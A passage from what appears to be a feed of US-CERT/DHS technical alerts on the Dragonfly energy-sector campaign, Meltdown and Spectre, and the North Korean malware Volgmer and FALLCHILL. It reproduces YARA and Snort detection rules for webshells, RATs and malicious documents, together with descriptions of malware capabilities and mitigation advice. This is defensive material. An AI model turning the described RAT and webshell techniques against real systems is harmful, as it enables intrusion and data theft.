or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)}   rule APT_malware_2{meta:      description = "rule detects malware"      author = "other" strings:      $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }      $http_push = "X-mode: push" nocase      $http_pop = "X-mode: pop" nocase condition:      any of them}   rule Query_XML_Code_MAL_DOC_PT_2{meta:     name= "Query_XML_Code_MAL_DOC_PT_2"     author = "other" strings:             $zip_magic = { 50 4b 03 04 }            $dir1 = "word/_rels/settings.xml.rels"            $bytes = {8c 90 cd 4e eb 30 10 85 d7} condition:            $zip_magic at 0 and $dir1 and $bytes}   rule Query_Javascript_Decode_Function{meta:      name= "Query_Javascript_Decode_Function"      author = "other" strings:      $decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}      $decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}      $decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}      $decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}      $func_call="a(\"" condition:      filesize < 20KB and #func_call > 20 and all of ($decode*) }   rule Query_XML_Code_MAL_DOC{meta:      name= "Query_XML_Code_MAL_DOC"      author = "other" strings:      $zip_magic = { 50 4b 03 04 }      $dir = "word/_rels/" ascii      $dir2 = "word/theme/theme1.xml" ascii      $style = "word/styles.xml" ascii condition:      $zip_magic at 0 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd}   rule z_webshell{meta:            description = "Detection for the z_webshell"            author = "DHS NCCIC Hunt and Incident Response Team"            date = "2018/01/25"            md5 =  "2C9095C965A55EFC46E16B86F9B7D6C6" strings:            $aspx_identifier1 = "<%@ " nocase ascii wide            $aspx_identifier2 = "<asp:" nocase ascii wide            $script_import = /(import|assembly) Name(space)?\=\"(System|Microsoft)/ nocase ascii wide            $case_string = /case \"z_(dir|file|FM|sql)_/ nocase ascii wide            $webshell_name = "public string z_progname =" nocase ascii wide            $webshell_password = "public string Password =" nocase ascii wide condition:            1 of ($aspx_identifier*)            and #script_import > 10            and #case_string > 7            and 2 of ($webshell_*)            and filesize < 100KB} Impact This actors’ campaign has affected multiple organizations in the energy, nuclear, water, aviation, construction, and critical manufacturing sectors. Solution DHS and FBI encourage network users and administrators to use the following detection and prevention guidelines to help defend against this activity. Network and Host-based SignaturesDHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, and YARA and Snort signatures provided and add the IPs to their watch list to determine whether malicious activity is occurring within their organization. Reviewing network perimeter netflow will help determine whether a network has experienced suspicious activity. Network defenders and malware analysts should use the YARA and Snort signatures provided in the associated YARA and .txt file to identify malicious activity. Detections and Prevention MeasuresUsers and administrators may detect spear phishing, watering hole, web shell, and remote access activity by comparing all IP addresses and domain names listed in the IOC packages to the following locations:network intrusion detection system/network intrusion protection system logs,web content logs,proxy server logs,domain name server resolution logs,packet capture (PCAP) repositories,firewall logs,workstation Internet browsing history logs,host-based intrusion detection system /host-based intrusion prevention system (HIPS) logs,data loss prevention logs,exchange server logs,user mailboxes,mail filter logs,mail content logs,AV mail logs,OWA logs,Blackberry Enterprise Server logs, andMobile Device Management logs.To detect the presence of web shells on external-facing servers, compare IP addresses, filenames, and file hashes listed in the IOC packages with the following locations:application logs,IIS/Apache logs,file system,intrusion detection system/ intrusion prevention system logs,PCAP repositories,firewall logs, andreverse proxy.Detect spear-phishing by searching workstation file systems and network-based user directories, for attachment filenames and hashes found in the IOC packages.Detect persistence in VDI environments by searching file shares containing user profiles for all .lnk files.Detect evasion techniques by the actors by identifying deleted logs. This can be done by reviewing last-seen entries and by searching for event 104 on Windows system logs.Detect persistence by reviewing all administrator accounts on systems to identify unauthorized accounts, especially those created recently.Detect the malicious use of legitimate credentials by reviewing the access times of remotely accessible systems for all users. Any unusual login times should be reviewed by the account owners.Detect the malicious use of legitimate credentials by validating all remote desktop and VPN sessions of any user’s credentials suspected to be compromised.Detect spear-phishing by searching OWA logs for all IP addresses listed in the IOC packages.Detect spear-phishing through a network by validating all new email accounts created on mail servers, especially those with external user access.Detect persistence on servers by searching system logs for all filenames listed in the IOC packages.Detect lateral movement and privilege escalation by searching PowerShell logs for all filenames ending in “.ps1” contained in the IOC packages. (Note: requires PowerShell version 5, and PowerShell logging must be enabled prior to the activity.)Detect persistence by reviewing all installed applications on critical systems for unauthorized applications, specifically note FortiClient VPN and Python 2.7.Detect persistence by searching for the value of “REG_DWORD 100” at registry location “HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal”. Services\MaxInstanceCount” and the value of “REG_DWORD 1” at location “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\dontdisplaylastusername”.Detect installation by searching all proxy logs for downloads from URIs without domain names. General Best Practices Applicable to this Campaign:Prevent external communication of all versions of SMB and related protocols at the network boundary by blocking TCP ports 139 and 445 with related UDP port 137. See the NCCIC/US-CERT publication on SMB Security Best Practices for more information.Block the Web-based Distributed Authoring and Versioning (WebDAV) protocol on border gateway devices on the network.Monitor VPN logs for abnormal activity (e.g., off-hour logins, unauthorized IP address logins, and multiple concurrent logins).Deploy web and email filters on the network. Configure these devices to scan for known bad domain names, sources, and addresses; block these before receiving and downloading messages. This action will help to reduce the attack surface at the network’s first level of defense. Scan all emails, attachments, and downloads (both on the host and at the mail gateway) with a reputable anti-virus solution that includes cloud reputation services.Segment any critical networks or control systems from business systems and networks according to industry best practices.Ensure adequate logging and visibility on ingress and egress points.Ensure the use of PowerShell version 5, with enhanced logging enabled. Older versions of PowerShell do not provide adequate logging of the PowerShell commands an attacker may have executed. Enable PowerShell module logging, script block logging, and transcription. Send the associated logs to a centralized log repository for monitoring and analysis. See the FireEye blog post Greater Visibility through PowerShell Logging for more information.Implement the prevention, detection, and mitigation strategies outlined in the NCCIC/US-CERT Alert TA15-314A – Compromised Web Servers and Web Shells – Threat Awareness and Guidance.Establish a training mechanism to inform end users on proper email and web usage, highlighting current information and analysis, and including common indicators of phishing. End users should have clear instructions on how to report unusual or suspicious emails.Implement application directory whitelisting. System administrators may implement application or application directory whitelisting through Microsoft Software Restriction Policy, AppLocker, or similar software. Safe defaults allow applications to run from PROGRAMFILES, PROGRAMFILES(X86), SYSTEM32, and any ICS software folders. All other locations should be disallowed unless an exception is granted.Block RDP connections originating from untrusted external addresses unless an exception exists; routinely review exceptions on a regular basis for validity.Store system logs of mission critical systems for at least one year within a security information event management tool.Ensure applications are configured to log the proper level of detail for an incident response investigation.Consider implementing HIPS or other controls to prevent unauthorized code execution.Establish least-privilege controls.Reduce the number of Active Directory domain and enterprise administrator accounts.Based on the suspected level of compromise, reset all user, administrator, and service account credentials across all local and domain systems.Establish a password policy to require complex passwords for all users.Ensure that accounts for network administration do not have external connectivity.Ensure that network administrators use non-privileged accounts for email and Internet access.Use two-factor authentication for all authentication, with special emphasis on any external-facing interfaces and high-risk environments (e.g., remote access, privileged access, and access to sensitive data).Implement a process for logging and auditing activities conducted by privileged accounts.Enable logging and alerting on privilege escalations and role changes.Periodically conduct searches of publically available information to ensure no sensitive information has been disclosed. Review photographs and documents for sensitive data that may have inadvertently been included.Assign sufficient personnel to review logs, including records of alerts.Complete independent security (as opposed to compliance) risk review.Create and participate in information sharing programs.Create and maintain network and system documentation to aid in timely incident response. Documentation should include network diagrams, asset owners, type of asset, and an incident response plan. Report NoticeDHS encourages recipients who identify the use of tools or techniques discussed in this document to report information to DHS or law enforcement immediately. To request incident response resources or technical assistance, contact NCCIC at NCCICcustomerservice@hq.dhs.gov or 888-282-0870 and the FBI through a local field office or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937). References [1] Symantec. Dragonfly: Western energy sector targeted by sophisticated attack group. September 6, 2017. [2] CERT CC. Vulnerability Note #672268 [3] CCIRC CF17-010 UPDATE [4] MIFR-10127623 Revision History March 15, 2018: Initial Version This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA18-004A: Meltdown and Spectre Side-Channel Vulnerability Guidance
    by US-CERT on 4 gennaio 2018 at 6:47 pm

    Original release date: January 04, 2018 | Last revised: February 10, 2018Systems Affected CPU hardware implementations Overview On January 3, 2018, the National Cybersecurity and Communications Integration Center (NCCIC) became aware of a set of security vulnerabilities—known as Meltdown and Spectre—that affect modern computer processors. These vulnerabilities can be exploited to steal sensitive data present in a computer systems' memory. Description CPU hardware implementations are vulnerable to side-channel attacks, referred to as Meltdown and Spectre. Meltdown is a bug that "melts" the security boundaries normally enforced by the hardware, affecting desktops, laptops, and cloud computers. Spectre is a flaw an attacker can exploit to force a program to reveal its data. The name derives from "speculative execution"—an optimization method a computer system performs to check whether it will work to prevent a delay when actually executed. Spectre affects almost all devices including desktops, laptops, cloud servers, and smartphones.More details of these attacks can be found here:Common Vulnerability and Exposure (CVE):Rogue Data Cache Load: CVE-2017-5754 (Meltdown) https://nvd.nist.gov/vuln/detail/CVE-2017-5754Bounds Check Bypass: CVE-2017-5753 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5753Branch Target Injection: CVE-2017-5715 (Spectre) https://nvd.nist.gov/vuln/detail/CVE-2017-5715CERT/CC’s Vulnerability Note VU#584653Impact An attacker can gain access to the system by establishing command and control presence on a machine via malicious Javascript, malvertising, or phishing. Once successful, the attacker could escalate privileges to exploit Meltdown and Spectre vulnerabilities, revealing sensitive information from a computer’s kernel memory, including keystrokes, passwords, encryption keys, and other valuable information. Solution MitigationNCCIC encourages users and administrators to refer to their hardware and software vendors for the most recent information. In the case of Spectre, the vulnerability exists in CPU architecture rather than in software, and is not easily patched; however, this vulnerability is more difficult to exploit. After patching, performance impacts may vary, depending on use cases. NCCIC recommends administrators ensure that performance is monitored for critical applications and services, and work with their vendor(s) and service provider(s) to mitigate the effect, if possible.Additionally, NCCIC recommends users and administrators who rely on cloud infrastructure work with their CSP to mitigate and resolve any impacts resulting from host OS patching and mandatory rebooting.For machines running Windows Server, a number of registry changes must be completed in addition to installation of the patches.  NCCIC recommends verifying your Windows Server version before downloading applicable patches and performing registry edits.  A list of registry changes can be found here: https://support.microsoft.com/en-us/help/4072698/windows-server-guidance-to-protect-against-the-speculative-executionAntivirusTypical antivirus programs are built on a signature management system, and may not be able to detect the vulnerabilities. NCCIC recommends checking with your antivirus vendor to confirm compatibility with Meltdown and Spectre patches. Microsoft recommends third-party antivirus vendors add a change to the registry key of the machine running the antivirus software. Without it, that machine will not receive any of the following fixes from Microsoft:Windows UpdateWindows Server Update ServicesSystem Center Configuration Manager More information can be found here: https://support.microsoft.com/en-us/help/4072699/january-3-2018-windows-security-updates-and-antivirus-software.Vendor LinksThe following table contains links to advisories and patches published in response to the vulnerabilities. This table will be updated as information becomes available.Note: NCCIC strongly recommends:downloading any patches or microcode directly from your vendor's websiteusing a test environment to verify each patch before implmentingLink to Vendor InformationDate AddedAmazonJanuary 4, 2018AMDJanuary 4, 2018AndroidJanuary 4, 2018AppleJanuary 4, 2018ARMJanuary 4, 2018CentOSJanuary 4, 2018ChromiumJanuary 4, 2018CiscoJanuary 10, 2018CitrixJanuary 4, 2018DebianJanuary 5, 2018DragonflyBSDJanuary 8, 2018F5January 4, 2018Fedora ProjectJanuary 5, 2018FortinetJanuary 5, 2018HPJanuary 19, 2018GoogleJanuary 4, 2018HuaweiJanuary 4, 2018IBMJanuary 5, 2018IntelJanuary 4, 2018JuniperJanuary 8, 2018LenovoJanuary 4, 2018LinuxJanuary 4, 2018LLVM: variant #2January 8, 2018LLVM: builtin_load_no_speculateJanuary 8, 2018LLVM: llvm.nospeculatedloadJanuary 8, 2018Microsoft AzureJanuary 4, 2018MicrosoftJanuary 4, 2018MozillaJanuary 4, 2018NetAppJanuary 8, 2018NutanixJanuary 10, 2018NVIDIAJanuary 4, 2018OpenSuSEJanuary 4, 2018OracleJanuary 17, 2018QubesJanuary 8, 2018Red HatJanuary 4, 2018SuSEJanuary 4, 2018SynologyJanuary 8, 2018Trend MicroJanuary 4, 2018UbuntuJanuary 17, 2018VMwareJanuary 10, 2018XenJanuary 4, 2018  References Graz University of Technology Meltdown website Graz University of Technology Spectre website Rogue Data Cache Load: CVE-2017-5754 Bounds Check Bypass: CVE-2017-5753 Branch Target Injection: CVE-2017-5715 CERT/CC’s Vulnerability Note VU#584653 Revision History January 4, 2018: Initial version January 5, 2018: Updated vendor information links for Citrix, Mozilla, and IBM in the table and added links to Debian, Fedora Project, and Fortinet January 8, 2018: Added links to DragonflyBSD, Juniper, LLVM, NetApp, Qubes, and Synology January 9, 2018: Updated Solution Section January 10, 2018: Added links to Cisco and Nutanix January 17, 2018: Added note to Mitigation section and links to Oracle and Ubuntu January 18, 2018: Updated Description, Impact, and Solution Sections, and added an additional link January 19, 2018: Added link to HP January 31, 2018: Provided additional links and updated Description and Mitigation sections This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-318B: HIDDEN COBRA – North Korean Trojan: Volgmer
    by US-CERT on 14 novembre 2017 at 7:00 pm

    Original release date: November 14, 2017 | Last revised: November 22, 2017Systems Affected Network systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a Trojan malware variant used by the North Korean government—commonly known as Volgmer. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity.This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with Volgmer malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the Volgmer malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.For a downloadable copy of IOCs, see:IOCs (.csv)IOCs (.stix)NCCIC conducted analysis on five files associated with or identified as Volgmer malware and produced a Malware Analysis Report (MAR). MAR-10135536-D examines the tactics, techniques, and procedures observed. For a downloadable copy of the MAR, see:MAR (.pdf)MAR IOCs (.stix)Description Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with VolgmerThe U.S. Government has analyzed Volgmer’s infrastructure and have identified it on systems using both dynamic and static IP addresses. At least 94 static IP addresses were identified, as well as dynamic IP addresses registered across various countries. The greatest concentrations of dynamic IPs addresses are identified below by approximate percentage:India (772 IPs) 25.4 percentIran (373 IPs) 12.3 percentPakistan (343 IPs) 11.3 percentSaudi Arabia (182 IPs) 6 percentTaiwan (169 IPs) 5.6 percentThailand (140 IPs) 4.6 percentSri Lanka (121 IPs) 4 percentChina (82 IPs, including Hong Kong (12)) 2.7 percentVietnam (80 IPs) 2.6 percentIndonesia (68 IPs) 2.2 percentRussia (68 IPs) 2.2 percentTechnical DetailsAs a backdoor Trojan, Volgmer has several capabilities including: gathering system information, updating service registry keys, downloading and uploading files, executing commands, terminating processes, and listing directories. In one of the samples received for analysis, the US-CERT Code Analysis Team observed botnet controller functionality.Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications.Malicious actors commonly maintain persistence on a victim’s system by installing the malware-as-a-service. Volgmer queries the system and randomly selects a service in which to install a copy of itself. The malware then overwrites the ServiceDLL entry in the selected service's registry entry. In some cases, HIDDEN COBRA actors give the created service a pseudo-random name that may be composed of various hardcoded words.Detection and ResponseThis alert’s IOC files provide HIDDEN COBRA indicators related to Volgmer. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.Network Signaturesalert tcp any any -> any any (msg:"Malformed_UA"; content:"User-Agent: Mozillar/"; depth:500; sid:99999999;)___________________________________________________________________________________________________YARA Rulesrule volgmer{meta:    description = "Malformed User Agent"strings:    $s = "Mozillar/"condition:    (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $s} Impact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts includetemporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.Solution Mitigation StrategiesDHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams. Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.Response to Unauthorized Network AccessContact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).References Revision History November 14, 2017: Initial version This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-318A: HIDDEN COBRA – North Korean Remote Administration Tool: FALLCHILL
    by US-CERT on 14 novembre 2017 at 6:09 pm

    Original release date: November 14, 2017 | Last revised: November 22, 2017Systems Affected Network systems Overview This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL. The U.S. Government refers to malicious cyber activity by the North Korean government as HIDDEN COBRA. For more information on HIDDEN COBRA activity, visit https://www.us-cert.gov/hiddencobra.FBI has high confidence that HIDDEN COBRA actors are using the IP addresses—listed in this report’s IOC files—to maintain a presence on victims’ networks and to further network exploitation. DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to any North Korean government malicious cyber activity.This alert includes IOCs related to HIDDEN COBRA, IP addresses linked to systems infected with FALLCHILL malware, malware descriptions, and associated signatures. This alert also includes suggested response actions to the IOCs provided, recommended mitigation techniques, and information on reporting incidents. If users or administrators detect activity associated with the FALLCHILL malware, they should immediately flag it, report it to the DHS National Cybersecurity and Communications Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and give it the highest priority for enhanced mitigation.For a downloadable copy of IOCs, see:IOCs (.csv)IOCs (.stix)NCCIC conducted analysis on two samples of FALLCHILL malware and produced a Malware Analysis Report (MAR). MAR-10135536-A examines the tactics, techniques, and procedures observed in the malware. For a downloadable copy of the MAR, see:MAR (.pdf)MAR IOCs (.stix)Description According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.During analysis of the infrastructure used by FALLCHILL malware, the U.S. Government identified 83 network nodes. Additionally, using publicly available registration information, the U.S. Government identified the countries in which the infected IP addresses are registered.Technical DetailsFALLCHILL is the primary component of a C2 infrastructure that uses multiple proxies to obfuscate network traffic between HIDDEN COBRA actors and a victim’s system. According to trusted third-party reporting, communication flows from the victim’s system to HIDDEN COBRA actors using a series of proxies as shown in figure 1.Figure 1. HIDDEN COBRA Communication FlowFALLCHILL uses fake Transport Layer Security (TLS) communications, encoding the data with RC4 encryption with the following key: [0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82]. FALLCHILL collects basic system information and beacons the following to the C2:operating system (OS) version information,processor information,system name,local IP address information,unique generated ID, andmedia access control (MAC) address.FALLCHILL contains the following built-in functions for remote operations that provide various capabilities on a victim’s system:retrieve information about all installed disks, including the disk type and the amount of free space on the disk;create, start, and terminate a new process and its primary thread;search, read, write, move, and execute files;get and modify file or directory timestamps;change the current directory for a process or file; anddelete malware and artifacts associated with the malware from the infected system.Detection and ResponseThis alert’s IOC files provide HIDDEN COBRA indicators related to FALLCHILL. DHS and FBI recommend that network administrators review the information provided, identify whether any of the provided IP addresses fall within their organizations’ allocated IP address space, and—if found—take necessary measures to remove the malware.When reviewing network perimeter logs for the IP addresses, organizations may find instances of these IP addresses attempting to connect to their systems. Upon reviewing the traffic from these IP addresses, system owners may find some traffic relates to malicious activity and some traffic relates to legitimate activity.Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with HIDDEN COBRA actors. Although created using a comprehensive vetting process, the possibility of false positives always remains. These signatures and rules should be used to supplement analysis and should not be used as a sole source of attributing this activity to HIDDEN COBRA actors.Network Signaturesalert tcp any any -> any any (msg:"Malicious SSL 01 Detected";content:"|17 03 01 00 08|";  pcre:"/\x17\x03\x01\x00\x08.{4}\x04\x88\x4d\x76/"; rev:1; sid:2;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 02 Detected";content:"|17 03 01 00 08|";  pcre:"/\x17\x03\x01\x00\x08.{4}\x06\x88\x4d\x76/"; rev:1; sid:3;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 03 Detected";content:"|17 03 01 00 08|";  pcre:"/\x17\x03\x01\x00\x08.{4}\xb2\x63\x70\x7b/"; rev:1; sid:4;)___________________________________________________________________________________________alert tcp any any -> any any (msg:"Malicious SSL 04 Detected";content:"|17 03 01 00 08|";  pcre:"/\x17\x03\x01\x00\x08.{4}\xb0\x63\x70\x7b/"; rev:1; sid:5;)___________________________________________________________________________________________YARA RulesThe following rules were provided to NCCIC by a trusted third party for the purpose of assisting in the identification of malware associated with this alert.THIS DHS/NCCIC MATERIAL IS FURNISHED ON AN “AS-IS” BASIS.  These rules have been tested and determined to function effectively in a lab environment, but we have no way of knowing if they may function differently in a production network.  Anyone using these rules are encouraged to test them using a data set representitive of their environment.rule rc4_stack_key_fallchill{meta:    description = "rc4_stack_key"strings:    $stack_key = { 0d 06 09 2a ?? ?? ?? ?? 86 48 86 f7 ?? ?? ?? ?? 0d 01 01 01 ?? ?? ?? ?? 05 00 03 82 41 8b c9 41 8b d1 49 8b 40 08 48 ff c2 88 4c 02 ff ff c1 81 f9 00 01 00 00 7c eb }condition:    (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $stack_key}rule success_fail_codes_fallchill{meta:    description = "success_fail_codes"strings:    $s0 = { 68 7a 34 12 00 }      $s1 = { ba 7a 34 12 00 }      $f0 = { 68 5c 34 12 00 }      $f1 = { ba 5c 34 12 00 }condition:    (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and (($s0 and $f0) or ($s1 and $f1))}___________________________________________________________________________________________ Impact A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:temporary or permanent loss of sensitive or proprietary information,disruption to regular operations,financial losses incurred to restore systems and files, andpotential harm to an organization’s reputation.Solution Mitigation StrategiesDHS recommends that users and administrators use the following best practices as preventive measures to protect their computer networks:Use application whitelisting to help prevent malicious software and unapproved programs from running. Application whitelisting is one of the best security strategies as it allows only specified programs to run, while blocking all others, including malicious software.Keep operating systems and software up-to-date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Patching with the latest updates greatly reduces the number of exploitable entry points available to an attacker.Maintain up-to-date antivirus software, and scan all software downloaded from the Internet before executing.Restrict users’ abilities (permissions) to install and run unwanted software applications, and apply the principle of “least privilege” to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, embedded code will execute the malware on the machine. For enterprises or organizations, it may be best to block email messages with attachments from suspicious sources. For information on safely handling email attachments, see Recognizing and Avoiding Email Scams. Follow safe practices when browsing the web. See Good Security Habits and Safeguarding Your Data for additional details.Do not follow unsolicited web links in emails. See Avoiding Social Engineering and Phishing Attacks for more information.Response to Unauthorized Network AccessContact DHS or your local FBI office immediately. To report an intrusion and request resources for incident response or technical assistance, contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), FBI through a local field office, or the FBI’s Cyber Division (CyWatch@fbi.gov or 855-292-3937).  References Revision History November 14, 2017: Initial version This product is provided subject to this Notification and this Privacy & Use policy. […]

  • TA17-293A: Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
    by US-CERT on 20 ottobre 2017 at 10:50 pm

    Original release date: October 20, 2017 | Last revised: March 15, 2018Systems Affected Domain ControllersFile ServersEmail ServersOverview This alert has been superseded by newer information. The old alert is provided below for historical reference only. For the newest version, please see TA18-074A. This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. Working with U.S. and international partners, DHS and FBI identified victims in these sectors. This report contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on compromised victims’ networks. DHS assesses this activity as a multi-stage intrusion campaign by threat actors targeting low security and small networks to gain access and move laterally to networks of major, high value asset owners within the energy sector. Based on malware analysis and observed IOCs, DHS has confidence that this campaign is still ongoing, and threat actors are actively pursuing their ultimate objectives over a long-term campaign. The intent of this product is to educate network defenders and enable them to identify and reduce exposure to malicious activity.For a downloadable copy of IOC packages and associated files, see:TA17-293A_TLP_WHITE.csvTA17-293A_TLP_WHITE_stix.xmlMIFR-10127623_TLP_WHITE.pdfMIFR-10127623_TLP_WHITE_stix.xmlMIFR-10128327_TLP_WHITE.pdfMIFR-10128327_TLP_WHITE_stix.xmlMIFR-10128336_TLP_WHITE.pdfMIFR-10128336_TLP_WHITE_stix.xmlMIFR-10128830­_TLP_WHITE.pdfMIFR-10128830­_TLP_WHITE_stix.xmlMIFR-10128883_TLP_WHITE.pdfMIFR-10128883_TLP_WHITE_stix.xmlMIFR-10135300_TLP_WHITE.pdfMIFR-10135300_TLP_WHITE_stix.xmlContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance. Description Since at least May 2017, threat actors have targeted government entities and the energy, water, aviation, nuclear, and critical manufacturing sectors, and, in some cases, have leveraged their capabilities to compromise victims’ networks. Historically, cyber threat actors have targeted the energy sector with various results, ranging from cyber espionage to the ability to disrupt energy systems in the event of a hostile conflict. [1] Historically, threat actors have also targeted other critical infrastructure sectors with similar campaigns.Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity. Of specific note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [2]This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third party suppliers with less secure networks. The initial victims are referred to as “staging targets” throughout this alert. The threat actor uses the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. The ultimate objective of the cyber threat actors is to compromise organizational networks, which are referred throughout this alert as “intended 